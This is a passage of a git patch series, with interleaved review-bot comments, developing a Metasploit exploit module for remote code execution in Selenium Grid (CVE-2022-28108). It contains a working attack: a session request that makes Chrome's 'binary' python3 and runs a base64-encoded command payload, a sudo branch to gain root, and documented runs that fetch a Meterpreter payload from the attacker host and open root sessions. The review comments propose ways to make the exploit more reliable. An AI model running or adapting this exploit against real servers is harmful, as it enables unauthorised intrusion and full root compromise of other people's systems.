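Review bot: `JSON.parse(json_str)` has no rescue, so a page whose `Object.freeze('...')` argument is not valid JSON makes `check` raise `JSON::ParserError` instead of returning `Unknown`; `Rex::Version.new(json_data['version'])` likewise raises if the value is not a well-formed version string, assuming Rex::Version inherits Gem::Version's `ArgumentError`. `json_data.include?('version')` followed by `json_data['version']` also presumes a Hash, which `JSON.parse` does not guarantee for arbitrary input. The regex is spelled out twice and leaves the `.` in `Object.freeze` unescaped; computing it once with a named capture removes the duplication. The `check` method starts outside the hunk.
```ruby
    # … unchanged: GET request and 200 check …
    version_re = /var json = Object\.freeze\('(?<json>.*?)'\);/
    js_code = res.get_html_document.css('script').find { |script| script.text.match?(version_re) }
    return Exploit::CheckCode::Unknown unless js_code

    begin
      json_data = JSON.parse(js_code.text.match(version_re)[:json])
    rescue JSON::ParserError
      return Exploit::CheckCode::Unknown('Embedded status JSON could not be parsed')
    end
    return Exploit::CheckCode::Unknown unless json_data.is_a?(Hash) && json_data['version']

    begin
      version = Rex::Version.new(json_data['version'])
    rescue ArgumentError
      return Exploit::CheckCode::Unknown("Unrecognised version string: #{json_data['version']}")
    end
    # … unchanged: version comparison and CheckCode result …
```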
@@ -3,10 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'net/http'
-require 'uri'
-require 'json'
-
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 
@@ -89,8 +85,6 @@ def check
 end
 
 def exploit
- url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session')))
-
 # Create the request body as a Ruby hash and then convert it to JSON
 body = {
 'capabilities' => {
@@ -104,13 +98,12 @@ def exploit
 }
 }.to_json
 
- # Set up the HTTP request
- request = Net::HTTP::Post.new(url.path, { 'Content-Type' => 'text/plain' })
- request.body = body
-
- # Make the HTTP request (with no-cors mode implied)
- http = Net::HTTP.new(url.host, url.port)
- http.request(request)
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
+ 'headers' => { 'Content-Type' => 'text/plain' },
+ 'data' => body
+ })
 end
 
 end
From 9bfccc429316c7b075f929a39ede5d4d1775bc75 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 28 Dec 2024 14:02:59 +0900
Subject: [PATCH 11/23] Review fix
* add check if sudo without password possible
* base64 encode payload
---
 .../http/selenium_greed_chrome_rce_cve_2022_28108.rb | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index e79745e1d997..56f3efcecf01 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -85,6 +85,14 @@ def check
 end
 
 def exploit
+ b64encoded_payload = Rex::Text.encode_base64(
+ "if sudo -n true 2>/dev/null; then\n"\
+ " sudo su root -c '#{payload.encoded}'\n"\
+ "else\n"\
+ " #{payload.encoded}\n"\
+ "fi\n"
+ )
+
 # Create the request body as a Ruby hash and then convert it to JSON
 body = {
 'capabilities' => {
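Review bot: `sudo -n true` only establishes that `true` may be run non-interactively; if the sudoers policy is narrower than `ALL`, the following `sudo su root -c` may still stop at a password prompt, so it should carry the same flag: `sudo -n su root -c '#{payload.encoded}'`. The privileged branch also wraps `payload.encoded` in single quotes, so a cmd payload that contains `'` breaks that branch while the `else` branch runs it unchanged. `payload.encoded` is interpolated twice, which doubles the size of the base64 blob placed in the chromeOptions args; building the command once and referencing it from both branches would avoid both issues. The `exploit` method continues past the hunk.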
@@ -92,7 +100,7 @@ def exploit
 'browserName' => 'chrome',
 'goog:chromeOptions' => {
 'binary' => '/usr/bin/python3',
- 'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"]
+ 'args' => ["-cimport base64,os; bp=b'#{b64encoded_payload}'; os.system(base64.b64decode(bp).decode())"]
 }
 }
 }
From 7ecc1cb87ba5bcb57dbf7d46d31a7fcc44b4c612 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 28 Dec 2024 14:39:24 +0900
Subject: [PATCH 12/23] Update vulnerable version
---
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.md | 3 ++-
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +-
 2 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
index 5bf8b097ecd6..4cd762e059b5 100644
--- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
@@ -5,11 +5,12 @@ such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
 
 The vulnerability affects:
 
- * Selenium Server (Grid) before 4
+ * Selenium Server (Grid) before 4.0.0-alpha-7
 
 This module was successfully tested on:
 
 * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4
+ * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4
 
 
 ### Installation
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 56f3efcecf01..d0db957afd14 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -15,7 +15,7 @@ def initialize(info = {})
 info,
 'Name' => 'Selenium chrome RCE',
 'Description' => %q{
- Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+ Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
 such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
 },
 'Author' => [
From 9f20c575e5f02ff8f1b9ab4bfce9e3c3b49a19b7 Mon Sep 17 00:00:00 2001
From: Takahiro Yokoyama
Date: Sat, 28 Dec 2024 14:40:44 +0900
Subject: [PATCH 13/23] Update modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb

Improve version detection messaging

Co-authored-by: bcoles
---
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index d0db957afd14..92e7d841fb51 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -80,8 +80,7 @@ def check
 return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
 end
 
- print_status("Version #{version} detected, which is vulnerable")
- Exploit::CheckCode::Appears
+ CheckCode::Appears("Version #{version} detected, which is vulnerable")
 end
 
 def exploit
From 6577a18abb355a307fb6c6a45fdd3b79cf25ea94 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 28 Dec 2024 15:04:35 +0900
Subject: [PATCH 14/23] Add response check

---
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 92e7d841fb51..2742383511a3 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -105,12 +105,13 @@ def exploit } }.to_json - send_request_cgi({ + res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wd/hub/session'), 'headers' => { 'Content-Type' => 'text/plain' }, 'data' => body }) + fail_with(Failure::Unreachable, 'Connection failed') unless res end end From 86bd1c2938ee05abf3b4201469920216d80ab4d6 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 29 Dec 2024 12:19:19 +0900 Subject: [PATCH 15/23] Minor improve * enable fetch_delete * avoid using single quotes * update doc --- ...elenium_greed_chrome_rce_cve_2022_28108.md | 39 ++++++++++++++----- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 5 ++- 2 files changed, 33 insertions(+), 11 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index 4cd762e059b5..fdedbc428bd0 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -1,6 +1,6 @@ ## Vulnerable Application -Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types +Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. The vulnerability affects: 
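Review bot: `fail_with(Failure::Unreachable, 'Connection failed') unless res` reports a nil response as the target being unreachable, but `send_request_cgi` also returns nil on a read timeout, and a session-creation request whose "browser" is the stager may not answer before the timeout even though the command has already run, so the module could report failure after the payload executed. Guarding on the handler as well, `fail_with(Failure::Unreachable, 'Connection failed') unless res || session_created?`, avoids that misreport. A non-nil response is not inspected at all; a `vprint_status` of `res.code` would make a rejected session easier to debug. The same point applies to the reworded line in the PATCH 20 hunk (`@@ -128,7 +128,7 @@`) later on this page.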
@@ -9,8 +9,8 @@ The vulnerability affects: This module was successfully tested on: - * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4 - * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4 + * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04 + * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 ### Installation @@ -33,6 +33,7 @@ This module was successfully tested on: ## Scenarios +### selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04 ``` msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108 [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp @@ -54,8 +55,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) - FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME KPrNrswF no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_DELETE true yes Attempt to delete the binary after execution + FETCH_FILENAME jcInmtImuA no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload 
@@ -74,20 +75,38 @@ Exploit target: View the full module info with the info, or info -d command. -msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Version 3.141.59 detected, which is vulnerable -[+] The target appears to be vulnerable. -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58562) at 2024-12-28 11:15:06 +0900 +[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564) at 2024-12-29 12:14:52 +0900 meterpreter > getuid Server username: root meterpreter > sysinfo -Computer : 172.17.0.2 +Computer : 172.17.0.4 OS : Ubuntu 20.04 (Linux 6.8.0-51-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ``` + +### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 +``` +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation. +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162) at 2024-12-29 12:15:49 +0900 + +meterpreter > getuid +Server username: root +meterpreter > sysinfo +Computer : 172.17.0.5 +OS : Ubuntu 18.04 (Linux 6.8.0-51-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` 
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 2742383511a3..3e6429cfedbc 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -44,6 +44,9 @@ def initialize(info = {})
 }
 ],
 ],
+ 'DefaultOptions' => {
+ 'FETCH_DELETE' => true
+ },
 'DefaultTarget' => 0,
 'DisclosureDate' => '2022-04-18',
 'Notes' => {
@@ -86,7 +89,7 @@ def check
 def exploit
 b64encoded_payload = Rex::Text.encode_base64(
 "if sudo -n true 2>/dev/null; then\n"\
- " sudo su root -c '#{payload.encoded}'\n"\
+ " echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\
 "else\n"\
 " #{payload.encoded}\n"\
 "fi\n"
From bbc282e90cbb58a6a7711986b659d8267c29fb7b Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Mon, 30 Dec 2024 13:36:15 +0900
Subject: [PATCH 16/23] Improve check

---
 ...elenium_greed_chrome_rce_cve_2022_28108.md | 18 ++++++++---------
 ...elenium_greed_chrome_rce_cve_2022_28108.rb | 20 +++++++++++++++----
 2 files changed, 25 insertions(+), 13 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
index fdedbc428bd0..21f9f50ea2cd 100644
--- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md
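Review bot: The probe uses `sudo -n true` but the elevation itself drops `-n`, so if the cached credential lapses between the two calls, or the sudoers rule matches `true` but not `su`, `sudo su root -c /bin/bash` can stall on a password prompt while its stdin is the base64 pipe; `echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo -n /bin/bash` keeps the non-interactive guarantee and removes the dependency on `su` being present. Separately, the new top-level `'DefaultOptions' => { 'FETCH_DELETE' => true }` in the first hunk sits beside a per-target `DefaultOptions` that carries `FETCH_COMMAND`; keeping the fetch-payload defaults in one place would be easier to maintain. The `initialize` and `exploit` bodies extend beyond these hunks.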
@@ -56,7 +56,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE true yes Attempt to delete the binary after execution - FETCH_FILENAME jcInmtImuA no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_FILENAME OmbNmrIU no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload @@ -75,16 +75,16 @@ Exploit target: View the full module info with the info, or info -d command. -msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564) at 2024-12-29 12:14:52 +0900 +[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable. +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40990) at 2024-12-30 13:33:31 +0900 meterpreter > getuid Server username: root meterpreter > sysinfo -Computer : 172.17.0.4 +Computer : 172.17.0.5 OS : Ubuntu 20.04 (Linux 6.8.0-51-generic) Architecture : x64 BuildTuple : x86_64-linux-musl 
@@ -94,16 +94,16 @@ meterpreter > ### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 ``` -msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation. -[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162) at 2024-12-29 12:15:49 +0900 +[!] The service is running, but could not be validated. Selenium Grid version 4.x detected. +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:34888) at 2024-12-30 13:34:30 +0900 meterpreter > getuid Server username: root meterpreter > sysinfo -Computer : 172.17.0.5 +Computer : 172.17.0.6 OS : Ubuntu 18.04 (Linux 6.8.0-51-generic) Architecture : x64 BuildTuple : x86_64-linux-musl diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 3e6429cfedbc..9ed89fa797d1 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb 
@@ -68,7 +68,19 @@ def check 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) - return Exploit::CheckCode::Unknown unless res&.code == 200 + if res&.code != 200 + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'status') + }) + if res && res.get_json_document && res.get_json_document.include?('value') && + res.get_json_document['value'].include?('message') && + res.get_json_document['value']['message'].downcase.include?('selenium grid') + return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') + end + + return Exploit::CheckCode::Unknown + end js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } return Exploit::CheckCode::Unknown unless js_code @@ -80,10 +92,10 @@ def check # Extract the version version = Rex::Version.new(json_data['version']) if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version - return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") + return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") end - CheckCode::Appears("Version #{version} detected, which is vulnerable") + CheckCode::Appears("Version #{version} detected, which is vulnerable.") end def exploit @@ -114,7 +126,7 @@ def exploit 'headers' => { 'Content-Type' => 'text/plain' }, 'data' => body }) - fail_with(Failure::Unreachable, 'Connection failed') unless res + fail_with(Failure::Unreachable, 'Connection failed.') unless res end end From 3a28df6b32cd511f583c440e9f9b0a7fab9f3a01 Mon Sep 17 00:00:00 2001 From: Takahiro Yokoyama Date: Sat, 4 Jan 2025 08:41:56 +0900 Subject: [PATCH 17/23] Apply suggestions from code review Co-authored-by: Diego Ledda --- .../http/selenium_greed_chrome_rce_cve_2022_28108.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) 
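Review bot: In the new 4.x branch `res.get_json_document` is called five times, re-parsing the body each time, and `res.get_json_document['value']` is assumed to respond to `include?`, so a `value` that is a number or `null` raises NoMethodError inside `check` instead of yielding Unknown. Binding the document once and type-checking it is both more readable and robust to odd replies: `doc = res.get_json_document`, `msg = doc.is_a?(Hash) && doc['value'].is_a?(Hash) ? doc['value']['message'] : nil`, `return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if msg.to_s.downcase.include?('selenium grid')`. The same chained access survives the rewrites in the PATCH 19 hunk (`@@ -62,25 +62,25 @@`) and the PATCH 22 hunk (`@@ -62,22 +62,21 @@`). `check` starts before this hunk.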
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 9ed89fa797d1..28d52e533fb5 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -30,7 +30,6 @@ def initialize(info = {})
 ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
 ],
 'Payload' => {
- 'DisableNops' => true
 },
 'Platform' => %w[linux],
 'Targets' => [
@@ -83,10 +82,14 @@ def check
 end
 
 js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
- return Exploit::CheckCode::Unknown unless js_code
+ return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code
 
 json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
- json_data = JSON.parse(json_str)
+ begin
+ json_data = JSON.parse(json_str)
+ rescue JSON::ParserError
+ return Exploit::CheckCode::Unknown('Unable to determine the version.')
+ end
 return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
 
 # Extract the version
From bf643041c338eda7b75de75a63c60c024ed1bffc Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 4 Jan 2025 08:46:12 +0900
Subject: [PATCH 18/23] Rubocop formatting

---
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 28d52e533fb5..5b9d855a3844 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
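Review bot: The new `rescue JSON::ParserError` covers `JSON.parse` but not `version = Rex::Version.new(json_data['version'])` just past the end of this hunk, which raises ArgumentError when the server-supplied string is not a well-formed version (Rex::Version follows Gem::Version parsing, as far as I recall), so a malformed or hostile `version` field still aborts `check` with a backtrace instead of returning Unknown. Moving that line inside the `begin` block and widening the clause to `rescue JSON::ParserError, ArgumentError` closes the gap; `json_data.include?('version')` also presumes a Hash root, which `json_data.is_a?(Hash)` would make explicit. The `Object.freeze` regex is written twice (in `find` and again in `match`), so a single frozen constant would stop the two from drifting apart. `check` starts before and ends after this hunk.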
@@ -29,8 +29,7 @@ def initialize(info = {})
 ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'],
 ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
 ],
- 'Payload' => {
- },
+ 'Payload' => {},
 'Platform' => %w[linux],
 'Targets' => [
 [
From 6cbb30c91a742e8e763c54c3a7230057f334b34c Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 4 Jan 2025 09:11:24 +0900
Subject: [PATCH 19/23] Avoid the code nesting

---
 ...elenium_greed_chrome_rce_cve_2022_28108.rb | 28 +++++++++----------
 1 file changed, 14 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
index 5b9d855a3844..4d383dcf1a3d 100644
--- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
@@ -62,25 +62,25 @@ def initialize(info = {})
 end
 
 def check
- res = send_request_cgi({
+ # Request for Selenium Grid version 3
+ v3res = send_request_cgi({
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path)
 })
- if res&.code != 200
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, 'status')
- })
- if res && res.get_json_document && res.get_json_document.include?('value') &&
- res.get_json_document['value'].include?('message') &&
- res.get_json_document['value']['message'].downcase.include?('selenium grid')
- return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.')
- end
+ # Request for Selenium Grid version 4
+ v4res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'status')
+ })
+ return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v3res&.code != 200 &&
+ v4res && v4res.get_json_document &&
+ v4res.get_json_document.include?('value') &&
+ v4res.get_json_document['value'].include?('message') &&
+ v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
 
- return Exploit::CheckCode::Unknown
- end
+ return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200
 
- js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+ js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
 return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code
 
 json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
From e2bf2162dcf4ceb2fe863f83f799f818736feb06 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sat, 4 Jan 2025 09:13:41 +0900
Subject: [PATCH 20/23] Update failure

---
 .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 4d383dcf1a3d..07655888c47b 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -128,7 +128,7 @@ def exploit 'headers' => { 'Content-Type' => 'text/plain' }, 'data' => body }) - fail_with(Failure::Unreachable, 'Connection failed.') unless res + fail_with(Failure::Unknown, 'Unexpected server reply.') unless res end end From 43294df0dd4397dd825e9f8ad256569cf1e710de Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 4 Jan 2025 10:21:43 +0900 Subject: [PATCH 21/23] Add a message about what is failing --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 07655888c47b..cb13c187e6b5 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -89,7 +89,7 @@ def check rescue JSON::ParserError return Exploit::CheckCode::Unknown('Unable to determine the version.') end - return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version'] + return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version'] # Extract the version version = Rex::Version.new(json_data['version']) From 474f5426b5ff03cabcbda824eda49b5e004093a2 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 6 Jan 2025 19:11:27 +0900 Subject: [PATCH 22/23] Update check --- .../selenium_greed_chrome_rce_cve_2022_28108.rb | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) 
diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index cb13c187e6b5..d66636c563e9 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -62,22 +62,21 @@ def initialize(info = {}) end def check - # Request for Selenium Grid version 3 - v3res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path) - }) # Request for Selenium Grid version 4 v4res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'status') }) - return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v3res&.code != 200 && - v4res && v4res.get_json_document && + return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') && v4res.get_json_document['value'].include?('message') && v4res.get_json_document['value']['message'].downcase.include?('selenium grid') + # Request for Selenium Grid version 3 + v3res = send_request_cgi({ + 'method' => 'GET', + 'uri' => 